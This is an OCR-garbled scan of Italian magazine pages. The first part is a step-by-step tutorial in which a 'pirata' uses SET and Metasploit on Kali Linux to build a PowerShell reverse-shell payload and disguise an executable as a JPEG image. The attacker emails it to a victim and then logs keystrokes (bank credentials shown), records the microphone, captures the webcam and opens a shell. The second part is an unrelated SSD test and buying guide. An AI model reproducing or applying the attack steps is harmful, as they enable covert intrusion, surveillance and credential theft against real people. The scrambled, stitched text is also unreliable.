9 (Powershell Attack Vectors) e conferma con Invio. 


File Modifica Visualizza Cerca Terminale Aiuto 

root@kali:-# ifconfig 

eth0: flags=4163<UP,BROADCAST,RUNNING, MULTICAST 
inet NCORCRASH Dnetmask 255.,255.255.0 È 
inet6 .fe80:;::a00:27ff:fe5l:f26c prefixle 
ether 08:00:27:51:f2:6c txqueuelen 100 


RX packets 13 bytes 2252 (2.1 KiB) 

RX errors 0 dropped 0 overruns 0 fran 
TX packets 31 bytes 2771 (2.7 KiB) i 
TX errors 0. dropped 0 overruns 0. carrili 


Il pirata ha bisogno di sapere quale sia l'indirizzo IP 

della macchina attaccante. Se non lo conosce, clicca 
su File e seleziona Apri terminale. Nella nuova finestra digita 
ifconfig seguito da Invio: l'indirizzo IP appare accanto al testo 
inet. Lo incolla nella finestra di SET e conferma con Invio. 


: >1 

> IP address for the payload listener (LHO 

: > Enter the port for the revers 
*] Prepping the payload for delivery and injé 


| 

[*] Generating x86-based powershell injection 
[*] Finished generating powershell injection 
[*] Encoded to bypass execution restriction p 
[*] If you want the powershell commands and aj 
set/reports/powershell/ 
> Do you want to start the listener now [yi 


Il software crea automaticamente tutto il neces- 

sario: il pirata non deve far altro che restare a 
guardare il monitor. Al messaggio “Do youwantto start the 
listener now” risponde no e conferma con Invio. Il pirata può 
ora concentrarsi sulla finta immagine da inviare alla vittima. 


eos. 
seeo 


ee 
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SEMBRA UN'IMMAGINE, MA NON LO È! 


L'obiettivo del pirata è quello di invadere il PC Windows di 
una vittima, ma senza destare sospetti. In questo caso, ciò 
che all'apparenza sembrerà alla vittima una comunissima im- 
magine (con tanto di anteprima), in realtà è un file eseguibile 
Windows (.exe) che, se avviato, andrà ad eseguire delle azioni 
malevole sul sistema operativo di casa Microsoft. Più nel det- 
taglio, quel file creerà un canale di comunicazione fra il PC 
della vittima (equipaggiato con Windows) e quello del pirata 
(sul quale è in esecuzione Kali Linux) che ne assumerà il pie- 
no controllo attivando da remoto la webcam, installando un 
keylogger o facendo incetta di tutti i file più importanti. 


È? ubuntu [In esecuzione] - Oracle VM VirtualBox 


Applicazioni v Posizioni v O Terminale v 


.set/reports/powershe 


Il pirata avvia una nuova finestra del terminale, lan- 
cia il comando mv /root/.set/reports/powershell/ 
x86_powershell_injection.txt /var/www/htmU/payload.txt 
e conferma con Invio. Il payload è ora stato spostato sul web 
server di modo che sia accessibile anche agli altri PC. 


Posizioni v ® Iceweasel v 


pplicazioni v 


Nome: screenshot.jpg] 


bersi 


Salva nella cartella: (($) var www htm 


Risorse 


Q, Ricerca 


Il pirata può procedere al salvataggio dell'imma- 

gine. Con un clic destro sull'immagine designata, 
clicca su Salva immagine con nome e, nella nuova finestra 
che appare, raggiunge il percorso /var/www/html/. Nomina 
l'immagine come screenshot.jpg. 


i root@ka' 
File Modifica Visualizza Cerca Terminale Aiuto î 
root@kali:-# mv /root 
WWW ht ml p a\ 


root@kali:- 


COSA FA IL CODICE DEL PIRATA? 


Nonostante si possa pensare il contrario, il codice utilizzato 
dal malintenzionato per invadere un sistema equipaggiato con 
Windows è davvero banale (lo analizzeremo a breve). Il più, 
infatti, è costituito dal payload che, come abbiamo già avu- 
to modo di scoprire, viene creato automaticamente dai tool 
integrati in Kali Linux. Dunque, le poche righe di codice (che 
scopriremo fra qualche pagina) servono giusto per far sì che il 
payload venga caricato sul PC della vittima e, per non destare 
sospetti, far sì che un'immagine venga effettivamente visualiz- 
zata. Di fatto, però, l'immagine verrà richiamata sul web server 
del PC attaccante. 


Posizioni 7 {#8 iceweasel + 


Applicazioni v 


funny cat meme - Google Search - lcd 
G funny cat meme - Go... x | + 


at&source=lnms&tbm @ (9 s 


€ @ ditps rà ww.google.co.uk/search?q=pretty+ 


Most Visited» EOffensive Security “Kali Linux "N Kali Docs Kali Tools ERlExploît 


n lese 


Animal 


WAS:AWFUL.:S 
Grumpy Cat 


Il Web pullula di immagini divertenti: più sarà curiosa 
l'immagine utilizzata dal pirata, maggiori saranno 
le probabilità che il malcapitato deciderà di cliccarci su due 
volte per vederla ingrandita! Il pirata raggiunge dunque Google 
Immagini e sceglie la foto che ritiene più opportuna. 


root@ì 


File Modifica Visualizza Cerca Terminale Aiuto 
root@kali:-# mv 
www/html/payload.txt 

root@kali:-# service apache2 start 
root@kali:-# 


/root/.set/reports/powers 


A questo punto, tutto è pronto per avviare il web 

server locale (presente di default e già configurar- 
to in Kali Linux) e rendere accessibile il suo contenuto anche 
agli altri PC della rete. Il pirata avvia ilterminale e da qui 
digita service apache2 start seguito dal tasto Invio. 


eres 


esse 
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Il virus prende forma 


Per il pirata è arrivato il momento di creare il file da utilizzare come esca: pochi clic ed è subito pronto 


ubuntu [In esecuzione] - Oracle VM VirtualBox 


(E) gedit 


Applicazioni v Posizioni v 


\Apri v [FM 


#include<stdio.h> 
main() 


{ 


*Doct 


IL CODICE MALEVOLO 

Il pirata avvia il terminale e lancia il comando gedit 

per avviare un semplice editor di testo non format- 
tato. In un nuovo file incolla il codice presente alla pagina 
http://pastebin.com/BpYMb2rN avendo cura di sostituire 
l'indirizzo IP con quello della macchina attaccante. 


E ubuntu [In esecuzione] - Oracle VM VirtualBox 


Applicazioni v Posizioni v Terminale » 


ESEGUIBILE CREATO 
[1] Il pirata si ritrova nuovamente nella finestra del 
terminale. Per lui è arrivato il momento di trasfor- 
mare il file appena creato in un eseguibile Windows. Per 
farlo, raggiunge il percorso nel quale ha salvato il file .c (cd 
Scrivania) e digita gcc evil.c -o evil.exe seguito da Invio. 


Step 4. Select the icon format 


OPNG : 
VICO for Windows:7, V&ndows 8, Vista and XP 


‘/Favicon icon for your website 


} {e} 


O Custom sizes( OOriginal size Cl Multi-size in 


CONVERSIONE EFFETTUATA 

Il pirata scorre la pagina Web fino a raggiungere 

la sezione Select the icon format. Qui, clicca su ICO 
for Windows 7, Windows 8, Vista and XP e seleziona la casel- 
la 256x256. Non gli resta che cliccare sul pulsante Convert e 
attendere qualche secondo. 


{ ubuntu [In esecuzione] - Oracle VM VirtualBox 


E gedit v 


Posizioni v 


Applicazioni v 


| Annulla | Nome |evid {È 


‘ {Yroot | fi Scrivania | 


[) Documenti 


TUTTO IN UN FILE 

A modifiche effettuate, il pirata clicca sul pulsan- 

te Salva e memorizza il file (sulla Scrivania) con il 
nome che preferisce seguito da .c (ad esempio, evil.c). Non 
gli resta che confermare premendo nuovamente il pulsan- 
te Salva. Può quindi chiudere l'editor di testo Gedit. 


Step 1. Upload an image ! 
Select a PNG, JPG or BMP image( maximum size: 10 MB): 


Browse... | screenshot.jpg 


Or get an image from the Internet: 


http:/ 
DA IMMAGINE A ICONA 
A questo punto, il pirata avvia il browser e 
raggiunge il sito Web www.icoconvert.com. Clicca 
sul pulsante Browse e raggiunge il percorso nel quale ha 
salvato l'immagine screenshot.jpg, la seleziona e conferma 
prima con Apri e successivamente con Upload. 


N Kali Linux N Kali Docs "N Kali Tools ERExploit-DB Wa Aircrack 


Opening screenshot_r8p_icon.ico È 
You have chosen to open: 
© screenshotr8p_icon.ico 


which is: Icona Windows (110 KB) 
from: http://icoconvert.com 


SERVE WINE 

Infine, il pirata clicca su Download your icon, sele- 

ziona Save File e conferma con OK. A questo pun- 
to, da terminale, lancia il comando apt-get install wine per 
installare il software che gli consente di far girare anche.su 
GNU/Linux programmi nativi per Windows. 


esce. 
seco 


ee 
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() di | Dm ita eg RH Add Binary Resource Xx Te Ò | (i), 


Select File .. 


Resource Type: 
ICONGROUP 
Resource Name: 
È 


| 
| 
| 
| 
i Resource Language: 
Il 
Î 
| 


Add Resource 


SSIS INSISTE 


Dal Web, il pirata scarica il software Resource 

Hacker e lo installa su Kali Linux tramite Wine. 
Lo avvia, si sposta nel menu File, clicca su Open, raggiunge 
il percorso nel quale ha salvato il file .exe e ne conferma 
l'apertura. Clicca su Add Binary or Image Resource. 


@ Home | Downloads 


{< >| i 
D Recent k = È 
@ Home | è | - 
fi Desktop L* j È 
D Documents evilexe È 
eTsssI O 
SI Music : 


Il nuovo file .exe (salvato nella stessa directory 

nella quale è presente quello originale) ha ora 
un aspetto decisamente simile ad un'anteprima di una 
foto, se visualizzato su Windows: il malcapitato ci clic- 
cherà due volte convinto di aprire una vera immagine. 


2 VPN pivot 


ated with proxy pivoting? Upgrade t( È 
m/metasploit É 


it Pro -- learn more on http://rapi 


75 auxiliary - 


] 

] 

coders - 0 ] 
r-7.co/trymsp ] 


oit{handler) t \YLOAD / r 
dows 
1andler) 


Il pirata entra nel vivo dell'azione digitando set 

PAYLOAD windows/meterpreter/reverse_tcp e 
conferma con Invio: Con questo comando, dice al softwa- 
re Metasploit [msfconsole] di utilizzare il payload che ha 
creato in precedenza (pag. 25). 
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AH Resource Hacker - evil.exe È 


File Edit View Action Help 


DB Bam] 


f 


> } Icon 
w ...[F Icon Group 48 x 48.(16.8mil colors) - Ordinal name: 1 È 
fune 120 “= È 


Nella nuova finestra che appare, il pirata clicca 

su Select File e seleziona l'icona .ico trasferita al 
passo precedente. Conferma dapprima con Add Resource 
e, dopo essere ritornato all'interfaccia grafica principale di 
Resource Hacker, con un clic sul pulsante Save . 


? Upgrade to layer 


PN pivoting with 
on http://rapid7.com/n 6 


msf > use mul 


i bandlerM 


A questo punto, il pirata può inviare tramite | 

e-mail il nuovo file .exe (ma che in realtà sem- 
bra un'immagine) alla sua vittima. Avvia poi ilterminale e 
lancia il comando msfconsole. Digita quindi il comando use 
multi/handler e conferma con Invio. 


37 encoders 8 no 


> set PAYLOAD windows/meterp 
AYLOAD => windows/meterpreter/reverse tcp 
xploit(handler) > set LHOST 10. 
=> 10.0.2.15 
exploit(handler) 
RT => 4444 
f loit(handler) 


exploit(handler) 


> set LPORT 4444 


Il pirata lancia set LHOST seguito dall'indirizzo IP 

della macchina attaccante (ad esempio 10.0.2.15) 
e da Invio. Successivamente, digita set LPORT 4444, che è 
la porta in ascolto, e conferma premendo ancora una volta 
Invio. Tutto è pronto per sferrare l'attacco. 


Pieno controllo (non autorizzato) di Windows 


Il pirata assume il controllo dell'OS: spia dalla webcam, cattura screenshot e scova ogni password 


exploit(handler) > set LHOST 192.168.0.12 
=> 192. 0.12 


exploit(handler) > set LPORT 4444 


> exploit 


ploit(handler) 


{[*] Started reverse TCP handler on 192.168.0.12:4444 


[*] Starting the payload han 
. O.11 : 
).12:4444 -> 197 


All'interno di Metasploit (mfsconsole] il pirata 

lancia exploit. Ora, non gli rimane che sperare che 
il malcapitato che ha ricevuto la finta immagine decida di clic- 
carci su due volte e caschi nel tranello. Non appena lo farà, la 
sessione Meterpreter verrà avviata. 


Audio saved to: /root/WtjPDotb.wav 
mete rp reter > reco rd_mic 
[*]}Startingic;: 
[*] Stopped 
Audio saved to: 
meterpreter > record mic 
E'EStaFtinge:s 
[*] Stopped 
Audio saved to: 


/root/PhEYjqBM.wav 
-d 5 


/root/dhidVMof .wav 


Se il computer bersaglio è dotato di microfono, il 

pirata può addirittura catturare suoni, voci e ru- 
mori presenti nella stanza in cui si trova l'ignara vittima. Per 
farlo, il pirata lancia record_mic -d X, dove X è il numero di 
secondi di registrazione. 


Imcan= DI RIALI 

arting the keystroke sniffer... 
meterpreter > keyscan dump 
Dumping captured keystro 


google.it <Return> ciao ciao <Return> 
erpreter > keyscan_ stop 
Stopping the keystroke sniffer. 
meterpreter > keyscan_start 
Starting the keystroke sniffer... 
meterpreter > keyscan_dump 
Dumping captured keystrokes. 
Www.unicredit.it <Return> 65475695 <Tab> 12345678 <Retu 


Il pirata ha la possibilità di configurare un keylogger: 

ogni tasto premuto dalla vittima verrà registrato in 
modo da visualizzare (in chiaro) ogni password digitata. Il pira- 
ta lancia keyscan_start e, dopo un po' di tempo, keycan_dump 
per visualizzare tutti i caratteri digitati dal malcapitato. 


Keyscan start  keyscan_stop 
meterpreter > keyscan start 


Starting the keystroke sniffer... 
meterpreter > keyscan stop 
Stopping the keystroke sniffer... 
meterpreter > keyscan dump 
Dumping captured keystrokes. 


[-] stdapi ui get keys: Operation failed: Incorrect fune 
meterpreter > getdesktop 


Session 3\W\D 


Da quel momento in poi, la vita del malcapitato 

sarà davvero dura. Il pirata, infatti, può iniziare 

a sfruttare tutte le potenzialità di Metaploit. Ad esempio, 

per catturare uno screenshot, al pirata basta lanciare in 
Meterpreter il comando screenshot. 

Target IP 


Start time : 
Status : 


1 192.168.0.11 È 
2016-03-23 17:02:37 +0100 = 


Stesso dlecofso i per a Webcam il pirata può cat- 

turare un'istantanea di ciò che viene inquadrato o, 
addirittura, avviarne un live streaming. Gli basta lanciare web- 
cam_snap (per catturare solo un frame) o webcam_stream 
(per avviare lo streaming da visualizzare nel browser). 


1 una- donna: per-amic4 
2 UniCredit .pdf È 
vari 
virus 
voucher 


File 
15 Directory 


Come se non bastasse, il pirata può anche assume- 

re il pieno controllo del computer della sua vittima. 
Lanciando il comando shell, il pirata si ritrova di fronte ad un 
prompt dei comandi del PC bersaglio. Da qui, può esplorare file, 
cancellarli o aggiungerne di nuovi (ad esempio altri virus!). 


ess9 
ceeo 


es 
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UTILI CONSIGLI | 
PER GLI SSD / 


Velocita Turbo 


SAMSUNG 


——+ 


Forse non lo sai, ma un SSD può mettere le ali al tuo notebook o PC! 
I modelli “turbo” sono oggi ancora più convenienti: ma qual è il più veloce? 


hi vuole trasportare, con sicurezza, 
un certo numero di oggetti, li siste- 

merà in un camion. Chi vuol poter 
sempre disporre di un’accelerazione bru- 
ciante, sceglierà una macchina sportiva. 
Questa regola vale anche per gli hard disk 
e gli SSD dato che per conservare collezioni 
di brani musicali e film o per proteggere dati, 


un hard disk tradizionale si rivela perfetta- 
mente idoneo. Ma sistema operativo e sof- 
tware installati nel PC potranno esprimersi 
al meglio su un SSD, che offrirà, tra l’altro, 
anche una velocità più elevata. Fino a poco 


tempo fa però, questi dischi Solid State Dri- 
ves presentavano prezzi piuttosto elevati. 
Oggi, sono diventati veramente convenienti 
e, anche per i modelli più capienti da 1 TB, 
non si è obbligati a spendere un patrimo- 
nio. Abbiamo quindi deciso di mettere sotto 
torchio 32 fra gli attuali di SSD con prezzi a 
partire da 70 euro. Quale sarà il migliore? 


SENZA PIATTI SI VA 
PIU VELOCI 


La maggiore velocità offerta dagli SSD di- 
pende dalla loro struttura, priva di parti mec- 


caniche. Il chip di comando (controller) po-__ 
trà avere accesso immediato a tutte le celle 
di memoria, a differenza della testina di scrit- 
tura e lettura, presente su un hard disk, che 
dovrà invece attendere la rotazione dei dischi 
magnetici per selezionare il punto corretto su 
cui intervenire. Nel corso del test, gli SSD più 
veloci, in fase di lettura, sono stati in grado 
di consentire fino a 175.000 accessi al se- 
condo e oltre 85.000 in scrittura, a differen- 
za degli hard disk che permettono al massi- 
mo qualche centinaio di accessi. Il controller 
dell’SSD può inoltre agire contemporanea- 


mente su più celle di memoria offrendo così 
una velocità più elevata. Tramite il tradiziona- 
le connettore SATA, gli SSD testati sono riu- 
sciti a trasferire dati con velocità fino a 550 
MB/s, un valore triplicato rispetto ad un hard 
disk da 3,5 pollici. 


USO PRATICO: | VANTAGGI 
DELLA VELOCITA 


Nell’uso pratico, questa elevatissima velocità 
per il trasferimento dei dati è, però, raramente 
importante. Un SSD, nell’utilizzo quotidiano, 
consente soprattutto enormi vantaggi per la 


TURBO SSD 
TESTATI 


lettura frequente di file di piccole dimensioni. 
Questa differenza di velocità fa sì che, un PC 
dotato di SSD necessiti solo di pochi secondi 
per avviare il sistema operativo e i programmi 
installati. Ma gli SSD, quanto rendono effet- 
tivamente più veloce il lavoro di un PC? Per 
rispondere a questo interrogativo, abbia- 
mo sostituito con un SSD l’hard disk di un 
notebook uscito in commercio circa 2 anni 
fa. L'aumento di velocità più consistente è 
stato riscontrato utilizzando il computer per 
un uso professionale: infatti, con software 
come LibreOffice o Mozilla Firefox, la velo- 


cità è praticamente raddoppiata. Programmi 
per l'elaborazione di foto e video, che spre- 
mono solitamente le prestazioni del proces- 
sore, beneficiano invece poco dall'impiego 
di un SSD, ottenendo un aumento massimo 
della velocità pari a “solo” il 20%. Ma per un 
notebook di 2 anni di anzianità (ormai, prati- 
camente fatto fuori dalla tecnologia odierna) 
è comunque una percentuale apprezzabile 
capace di riportarlo in partita. 


RISPARMIO E SILENZIOSITÀ 


| primi SSD “divoravano” un maggior quan- 
titativo di corrente rispetto agli hard disk, a 
differenza dei modelli attuali che consentono 
addirittura un consumo energetico inferiore. 
Già da qualche tempo, infatti, un SSD è ca- 
pace di far sì che l'autonomia della batteria 
del notebook sul quale è installato aumenti. 
I modelli all'ultimo grido consentono poi di 
guadagnare ancor di più. Gli SSD non si ri- 
velano solo parsimoniosi (quanto meno in 
termini di consumo energetico), ma anche to- 
talmente silenziosi e di questi pregi ne gode 
tutto il notebook. 


CURA SNELLENTE 
PER GLI SSD 


La maggior parte degli SSD è alloggiata all’in- 
terno di un case da 2,5 pollici, ma il futuro ap- 
partiene al nuovo formato M.2, decisamente 
più piccolo (come si può vedere in figura), che 
riunisce in un unico modulo la seconda ge- 
nerazione dei due standard per mini SSD: il 
mini-Sata e il mini-PCle. Grazie a queste di- 
mensioni ridotte, gli SSD sono idonei anche 
per i notebook ultrapiatti (ultrabook). 

Sui notebook più grandi, un SSD M.2, lascia 
spazio sufficiente per installare anche un hard 
disk tradizionale utile per archiviare dati: ad 
esempio, una collezione di film. La maggior 
parte degli SSD M.2 presenta una larghezza 
di 22 mm ed una lunghezza da 30 a 110 mm. 
Tra i candidati al test, sette SSD M.2 presen- 
tavano una lunghezza di 80 mm e solo il Tran- 
scend TS512GMTS400, lungo 42 mm, è de- 
cisamente più corto. Nell’uso pratico, questa 
ridotta lunghezza, non si rivela però di grande 
vantaggio, poiché la maggior parte degli slot 
per gli SSD M.2 è progettata per accogliere 
varie lunghezze. 


MAGGIOR VELOCITÀ 
CON PCI EXPRESS 


Sia che si tratti del formato da 2,5 pollici o di 
quello M.2, la maggior parte degli SSD offre 


9° 
fo. 


una connessione SATA, che pur rivelandosi 
ideale per potenziare PC datati e notebo- 
ok, rallenta però la velocità, che non potrà 
superare i 550 MB/s. | minuscoli SSD M.2 
sfruttano quindi sempre più l'interfaccia PCI- 
Express. 

In origine, la connessione PCle era lo stan- 
dard per le schede d'espansione per PC e 
notebook, ma oggi sono disponibili anche 
mini varianti per SSD: 

m PCle 2.0 x2: la variante più semplice è 
in grado di eseguire trasferimenti attraverso 
due linee dati, con una velocità fino a 1 GB/S. 


{29 FIGSTIS 


Esistono SSD da 2,5 
pollici, con capienza fino a 13 TB, ma 
richiedono un prezzo di oltre 13.000 dollari 


—i-|: 


Attraverso numerose e 
complesse misurazioni, i tester 
rilevano la velocità degli SSD 
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Il calore può diventare dannoso peri chip 
di memoria e i tester misurano quindi 
accuratamente quanto si scaldano gli SSD 


m PCle 2.0 x4: con questa interfaccia si uti- 
lizzano quattro linee dati, per una velocità 
massima di trasferimento di 2 GB/s. 

m PCle 3.0 x4: anche questa variante lavora 
con quattro cavi dati, ma offre una velocità 
superiore, infatti è possibile raggiungere ve- 
locità di trasferimento fino a 4 GB/s. 

Il maxi SSD di Intel serie 750, dal prezzo 
esorbitante di 1140 euro e con capienza di 
1,2 TB, nonché il Samsung 950 Pro (330 
euro per 512 GB), grazie alle loro connessio- 
ni PCle-3.0, sono in grado di offrire velocità 
fino a 2,7 GB/s. Il costoso SSD di Intel non 
dispone però del formato M.2, ma presenta 


Ph _(MW1 SEVERITEST DI LINUX MAGAZINE 


I tester esaminano i minuscoli SSD 
M.2 su una scheda madre speciale, 
dotata di due slot M.2 


Standard attuale: la 
maggior parte degli SSD 
utilizza la connessione SATA 
per PC o notebook 


Co Mffernettntne “int 


SSD, come la 
serie 750 di 
Intel, vengono 
realizzati in 
special modo, 
per server e 
PC di elevata 
potenza, 
utilizzando 

‘una scheda da 

‘— . inserire nello 
slot PCle 


le dimensioni di una scheda PCI, che lo ren- 
dono quindi più idoneo ad essere utilizzato 
per un server. 


DIFFERENZE DI VELOCITA 

La velocità di un SSD non dipende soltan- 
to dal tipo di interfaccia, ma anche dalla ca- 
pacità. Per la lettura di file la capienza non è 
prioritaria, ma è invece importante il tipo di 
interfaccia. Infatti, i modelli PCle più costosi 
prelevano i dati dai chip di memoria:con una 
velocità doppia o triplicata, rispetto agli SSD 
con connessione SATA. 

Anche in fase di scrittura, i modelli PCle si ri- 


Al momento, gli SSD 
presentano il formato 
tradizionale da 2,5 
pollici . In futuro, 
saranno però sempre 
più disponibili 

SSD M.2, con 
lunghezze 

variabili di 42 

e 80 millimetri 


velano decisamente più veloci: il modello 3.0 
più rapido, ha richiesto solo 3,9 secondi per 
un file da 5 GB - volendo fare un confronto, 
un DVD contiene dati per 4,7 GB. Il modello 
2.0 più veloce, ha richiesto 7,7 secondi, pari 
ad un tempo quasi doppio. L'SSD-SATA più 
veloce, è riuscito a completare l’operazio- 
ne solo dopo 10,4 secondi e il modello più 
lento hà impiegato quasi un minuto. In par- 
ticolare, con gli SSD SATA più economici di 
capienza limitata, la rilevazione della veloci- 
tà in fase di scrittura, è stata molto scarsa. 
Tutto questo dipende dal fatto che, i modelli 
più piccoli presentano un numero inferiore di 
chip di memoria, che non consente al con- 
troller di lavorare a velocità massima. Solo 
gli SSD SATA. con capienza a partire da 480 


|é 


Chi sostituisce il proprio hard disk con un 


locità, come dimostrato dal notebook Me- 
dion Akoya E6416 che, con un SSD, ha of- 
ferto un aumento della velocità di lavoro, 


HARD DISK IN SSD 


18% 


SSD, otterrà un sensibile aumento della ve- 


pari al 78%. Soprattutto i programmi di pro- 
duttività si riveleranno molto più veloci, dato 


GB, sono in grado di scrivere dati a velocità 
elevata. 


TIRIAMO LE SOMME 

Più veloci, più parsimoniosi in termini di con- 
sumo, più silenziosi e con prezzi convenienti. 
Oggi, gli SSD non sono più un lusso costo- 
so e, soprattutto per i notebook, sono ormai 
quasi irrinunciabili. Per poter sfruttare i van- 
taggi della velocità, un SSD dovrebbe offri- 
re almeno una capacità di 512 GB. Il prezzo 
di 214 euro del vincitore Samsung 850 Pro 
dimostra che un modello di questo tipo non 
presenta un costo esorbitante. Nel test, ef- 
fettuato su sei categorie di SSD, Samsung, si 
è aggiudicato quattro vittorie e Kingston si è 
piazzato due volte al primo posto. 
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che devono caricare frequentemente file di 
piccole dimensioni. Anche il trasferimento 


di dati attraverso una porta USB 3.0 avverrà 


con una velocità più che raddoppiata. Inol- 
tre, grazie al basso consumo energetico ri- 
chiesto dagli SSD, l'autonomia della batte- 
ria aumenta di circa 20 minuti. 


I GRANDI MITI 
SUGLI SSD 


Un SSD lavora in modo totalmente 
diverso, rispetto ad un hard disk e, 
di conseguenza, sono nate numero- 
se leggende, non tutte vere: 


UN SSD È PIÙ ROBUSTO 


Vero, infatti un SSD sopporta meglio 
le vibrazioni e anche eventuali cadu- 
te, mentre è in funzione. Numerosi 
hard disk si danneggerebbero. 


CAPACITÀ PIÙ GRANDE _ 
EQUIVALE A MAGGIORE VELOCITA 


Un SSD da 128 GB può essere ef- 
fettivamente più lento di un modello 
da 256 GB. Le differenze tra gli SSD 
di grande capienza, sono minime. 


3 
d 


DEFRAG SUPERFLUO 


La deframmentazione può danneg- 
giare gli SSD? Vero, com'è anche ve- 
ro che le distribuzioni GNU/Linux 
non soffrono particolarmente di que- 
sta problematica (a differenza di al- 
tri OS proprietari). 


PIÙ VELOCE 0 
140% 
PIÙ VELOCE 
SCRIVERE DATI ALL'INFINITO 
: | Evero solo parzialmente, infatti non è 
IRSA 0 I). AI possibile scrivere incessantemente 


sulle celle di memoria di un SSD, ma, 
nell’uso pratico possono resistere da 
5a 10anni. 


*con USB 3.0 


Chi è già abituato alla velocità consentita da un SSD, non vor- 

rà certamente rinunciare ad un trasferimento dati veloce. La 

soluzione potrà essere un SSD esterno, che possiamo realiz- 

zare anche da soli (consiglio 5) oppure decidere di acquistare ì 

un modello già esistente, come il Sandisk Extreme 500, di- Il Sandisk Extreme 
sponibile nelle capacità da 120, 240 e 480 GB (a partire da 5) 500 è molto 

65 euro). Questo mini SSD (7,6 x 7,6 x 1,1 cm) pesa solo 40 ; più piccolo e più 
grammi e potrà essere agevolmente collegato al computer, at- i #8 velocediunhard 
traverso un cavo USB 3.0. N MY diskesterno 


E] PROTEZIONE DATI 


Con un SSD, è d'obbligo eseguire regolarmente un backup 
dei dati, poiché a differenza di un hard disk, i dati cancella- A 
ti potranno essere ripristinati, solo recuperandoli dal cesti- Cartelle da salvare fà Éposò 

no, ma chi lo avrà svuotato, avrà pochissime probabilità di | Ste — 
recuperare i dati. In Ubuntu, ad esempio, è già presente di Pianificazione 


Il prossimo backup verrà eseguito tra 3 giorni da oggi. 


default il tool Backup (raggiungibile dalla preferenze del si- unbactup vene adito automaticamente ogni settimana 


Esegui backup adesso. 


stema) che ci permette di pianificare backup dei file e del- 
le directory più importanti. La sicurezza massima potrà es- 
sere ottenuta, eseguendo il backup su un hard disk. 


APERTURA ae TWIST [57 nicencA 
DELCASE TA, DEL POSTO GIUSTO 


Con la maggior par- i : Su numerosi PC, dovre- 
te dei PC, sarà suffi- | 1 : mo installare I’SSD in 
ciente rimuovere il Mercer 1 a uno slot per hard disk. 
coperchio laterale. | i e (PS Solitamente, è disponi- 
È importante assicu- F —__— soi bile un vano libero (a 
rarsi di aver prima > - x E sinistra nella foto), ac- 
scollegato il cavo di sd Sasa canto a quello già pre- ‘ 
alimentazione. sente per il disco fisso. 
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DI 


Per archiviare grandi raccolte di foto o brani musicali, un 
SSD si rivela troppo costoso e anche la sua velocità potrà 
essere sfruttata molto poco. Si rivela quindi funzionale l’uti- 
lizzo di un hard disk tradizionale per memorizzare dati. La 
maggior parte dei PC (Consiglio 3), nonché sempre più no- 
tebook, si rivelano già idonei per l'utilizzo combinato di un 
hard disk e di un SSD. Le cartelle “Foto”, “Musica” e “Video” 
potranno essere spostate nel menu Proprietà (cliccando con 
il tasto destro sulla cartella), accedendo al tab Percorso. 


Places 

fi Home 

Bia Desktop 

DI documents 

è Downloads 

da Music 

@ Pictures 

HVideos 

W rash 
Devices 

IE computer 
Network 

SP Browse Net 


Dopo avere installato un SSD di ultima generazione, vi resterà spesso inuti- 
lizzato un hard disk o un SSD. Potrete comunque continuare a usare la vec- 
chia memoria come unità esterna. Per i modelli da 2,5 pollici (foto a de- 
stra) esistono appositi case vuoti, già a partire da 10 Euro, dotati di porta 
USB 3.0, che consentirà di collegare l’unità a quasi tutti i computer, senza 
alcun cavo di alimentazione. Case vuoti per SSD M.2 (foto all'estrema de- 
stra) sono invece ancora piuttosto rari, rivelandosi anche costosi, con un 
prezzo di circa 30 Euro. Un mini SSD potrà comunque essere sempre tra- 


sformato in una chiavetta USB superveloce. 


ai &; 
INSTALLAZIONE NEL CESTELLO DEGLI HDD =—INSTALLAZIO 


Con un case USB 

esterno, sarà possibile 
continuare a utilizzare gli hard 
disk e gli SSD dismessi 


QUICKSTORE 20! 


dparicvon 


NE NEL FRAME PER SSD COLLEGARE I CAVI 


Per eseguire l'installazione nel vano hard disk sarà necessa- Su alcuni PC è già presente un supporto per installarvi SSD Dopo avere collegato il cavo di alimentazione e quello per i 
ria una “cornice” che dovremo avvitare all’SSD. La dotazione da 2,5 pollici. Su numerosi PC che usano case di buona qua- dati, potremo procedere all'installazione della distro GNU/Li- 
di alcuni SSD include già questo elemento, ma se saremo lità, solitamente è posizionato sotto il vano dell'unità DVD. nux che preferiamo. Questa fase, è del tutto identica alla clas- 
costretti ad acquistarlo, il suo costo sarà solo di alcuni euro. L'SSD potrà essere inserito direttamente in questo vano. sica.installazione su hard disk. 


ret DEE RN 
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RISULTATI DEL NOSTRO |4 


MEGATEST SSD | ns © © [pes 


Prezzo: 120 Euro Prezzo: 106 Euro Prezzo: 97 Euro 
RICINITATI IN RPREVE Capacità Memoria: 256 Gigabyte Capacità Memoria: 256 Gigabyte Capacità Memoria: 256 Gigabyte 
MVSULIA SIE Connessione: SATA 6Gb/s Connessione: SATA 6Gb/s Connessione: SATA 6 Gb/s 
Controller: Samsung MEX (EXM01860) Controller: Toshiba TC358790 (JURA0101) Controller: Phison 3110 (SAFMOO.M) 
Altezza / Peso: 7 mm / 46 grammi Altezza / Peso: 7 mm / 53 grammi Altezza / Peso: 7 mm / 57 grammi 
Con quale velocità è possibile copiare i file? 60,00% velocità elevatissima I'SSD da 256GB più veloce nel test 


Copia di grandi file Video (Lettura / Scrittura ) 20,00%| veloce (476,17 MB/s) / veloce (455,41 MB/5) / veloce (473,09 MB/5) / 
veloce (479,74 MB/s) veloce (469,61 MB/s) velocissimo (487,04 MB/s) 


Copia piccoli file audio (Lettura / Scrittura ) 20,00%| veloce (417,67 MB/s) / veloce (415,3 MB/5) / veloce (401,29 MB/5) / 
velocissimo (490,09 MB/s) velocissimo (496,75 MB/s) velocissimo (514,74 MB/s) 


Velocità di trasferimento continuo (Lettura / Scrittura) 20,00%] veloce (545,58 MB/5) / [X-N) velocissimo (533,35 MB/5) / EYZ velocissimo (541,14 MB/s) / 
velocissimo (513,29 MB/s) velocissimo (493,04 MB/s) velocissimo (522,11 MB/s) 
Quale aumento di velocità procura l'SSD per l'avvio dei programmi? 30,00% awioultraveloce 9,32. avvio ultraveloce 9,12 
Numero delle operazioni di lettura e scrittura al secondo (IOPS) 15,00%| numerose (74.117) / 8,78 (CK: unpo' poche (51.702) / 
numerosissime (41.951) merose (39.857) poche (20.308) 
, 9,06 
) 


Velocità media per accesso ai dati (Lettura / Scrittura in Millisecondi) 15,00%| velocissimo (0,113 me) / {‘1::Ij veloce (0,186) / molto veloce veloce (0,158 ms) / 
velocissimo (0,050 ms) (0,059 msj velocissimo (0,104) 


Semplicità di messa in funzione? 5,00% include software, no accessori include software e adattatore | 6,40) mancano tutti gli accessori 


